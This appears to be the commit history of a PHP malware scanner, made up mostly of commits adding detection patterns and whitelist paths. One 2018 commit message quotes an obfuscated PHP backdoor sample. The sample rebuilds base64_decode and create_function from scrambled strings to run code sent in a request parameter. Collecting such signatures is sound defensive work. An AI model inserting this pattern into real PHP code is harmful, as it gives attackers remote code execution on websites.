Commit Graph

57 Commits

Author SHA1 Message Date
Benoît S. 59ad4ea20e New pattern 2018-10-19 14:48:35 +02:00
Bruno TATU 877a8992e4 add pattern 2018-05-21 11:19:00 +02:00
Romain Dessort 888d644b6a Add support for local whitelist
Since the whitelist file is redownloaded on each script execution, we
can not define our own paths to exclude from scan.
This commit introduces a evomalware.whitelist.local file to fix this
issue.
2018-01-29 10:36:15 -05:00
Benoît S. 4c89a12f28 Add a new pattern
if(isset($_REQUEST['sort'])){   ^M
        $string = $_REQUEST['sort'];^M
        $array_name = '';^M
        $alphabet = "wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";^M
        $ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7);^M
        foreach($ar as $t){^M
           $array_name .= $alphabet[$t];^M
        }^M
        $a = strrev("noi"."tcnuf"."_eta"."erc");^M
        $f = $a("", $array_name($string));^M
        // MALWARE $f();^M
        exit();^M
}
2018-01-04 17:59:22 +01:00
Benoît S. 01f5f68fd6 Update whitelist 2018-01-03 09:07:42 +01:00
Benoît S. 72b75906db Added wp-includes/formatting.php to whitelist 2017-11-28 14:40:33 +01:00
Benoît S. 95a31376f9 Add administrator/components/com_artadminer/adminer.php to whitelist 2017-07-20 17:39:02 +02:00
Benoît S. 9dfcdaf689 Add some files in the whitelist. 2017-05-26 15:17:24 +02:00
Benoît S. e65360f6a3 New whitelist. 2017-03-21 11:56:38 +01:00
Benoît S. 48e4133e50 Add pfn to whitelist. 2016-09-05 16:37:05 +02:00
Benoît S. 99f9c18029 Add wp-content/uploads/ithemes-security/index.php to whitelist. 2016-08-22 09:54:47 +02:00
Benoît S. a516356b7a Added crawlprotect/include/createhtaccess.php to whitelist. 2016-08-12 17:25:01 +02:00
Benoît S. f8d354f2ac Added Magento plugin to whitelist. 2016-05-06 15:25:32 +02:00
Benoît S. d734ea5235 Add new pattern to whitelist. 2016-05-06 12:27:14 +02:00
Benoît S. c5224ec31d Added some patterns to whitelist. 2016-04-18 18:00:11 +02:00
Benoît S. ee757a07b6 Add a JS lib into whitelist. 2016-03-11 14:29:42 +01:00
Benoît S. bb5b2f1a9f Add into whitelist: wp-content/uploads/backupbuddy_backups/index.php 2016-02-26 15:26:48 +01:00
Benoît S. 5eeee3e49b Whitelist whikimedia Language.php. 2016-02-17 09:53:51 +01:00
Benoît S. f97bf01643 New pattern. 2016-02-17 09:51:49 +01:00
Benoît S. 28534a8d15 Add a patern. 2016-02-15 09:34:22 +01:00
Benoît S. 97808bb3b0 New signature. 2016-02-12 14:49:46 +01:00
Benoît S. 5b8baef7dc Whitelist Extendware module. 2016-01-04 09:44:26 +01:00
Benoît S. 1f1e23419f Fixed typographical error, changed aggresive to aggressive in README.
By 171cf2ffc7
2015-12-11 17:48:15 +01:00
Benoît S. 47b1fecfbb Remove one pattern in BL (false positive) and add some patterns in WL. 2015-12-11 17:44:51 +01:00
Benoît S. 6472b23ef3 Add wp-content/uploads/wpallexport in whitelist. 2015-09-02 10:18:43 +02:00
Benoît S. 727f5d39f6 Added a backdoor. 2015-08-17 11:23:54 +02:00
Benoît S. 2a3dec544c Added a SPAM mailer. 2015-08-17 11:22:11 +02:00
Benoît S. 67bf686ffb And update MD5 list... 2015-08-17 10:54:09 +02:00
Benoît S. 4a73592c90 Remove a false positive pattern. 2015-08-17 10:52:38 +02:00
Benoît S. bc4c0ca3d7 Added LMD project. 2015-08-05 15:56:02 +02:00
Benoît S. 5274307217 Added patterns to whitelist. 2015-07-31 15:26:14 +02:00
Benoît S. 0e28b9ec3b Added Plecost project. 2015-07-15 10:29:43 +02:00
Benoît S. 4c385e8103 Add some path in whitelist. 2015-07-02 11:02:09 +02:00
Benoît S. 16d7ec928a Updated README. 2015-06-29 18:25:36 +02:00
Benoît S. c2eabbd343 Added README file. 2015-06-29 18:21:27 +02:00
Benoît S. 69e8c0fad7 Added files and patters. 2015-06-23 10:38:26 +02:00
Benoît S. ce3a712571 New patterns and filenames. 2015-05-07 10:39:37 +02:00
Benoît S. dbed861c40 New patterns. 2015-04-03 15:44:39 +02:00
Benoît S. 2bd2128c5a New patterns. 2015-04-03 15:44:31 +02:00
Benoît S. 6f9beb9e6d Add knowns patterns. 2015-03-26 11:58:38 +01:00
Benoît S. 4794f89b43 Added a new pattern. 2015-03-17 16:39:13 +01:00
Benoît S. 077359976a Redirect stderr of wc to /dev/null due to vanished files. 2015-03-17 16:38:45 +01:00
Benoît S. 784e17c0c9 Added WP plugin to whitelist. 2015-03-17 16:38:26 +01:00
Benoît S. d23e978ecc Replace md5sum --quiet with --status, more portable. 2015-03-12 15:27:38 +01:00
Benoît S. 7c0d965652 Whitelist include/utils/mvc_utils.php 2015-03-12 15:15:05 +01:00
Benoît S. bec1ce41b9 Add patterns. 2015-03-12 14:41:49 +01:00
Benoît S. e05b467c05 Add wp-content/plugins/magicmembers/core/libs/classes/mgm_auth.php to whitelist. 2015-03-10 16:57:29 +01:00
Benoît S. df9756514d New patterns for whitelist. 2015-03-10 15:38:48 +01:00
Benoît S. 4350cade4c New whitelist. 2015-02-09 10:08:11 +01:00
Benoît S. 953ee8c40f Added whitelist and patterns. 2015-02-09 09:53:12 +01:00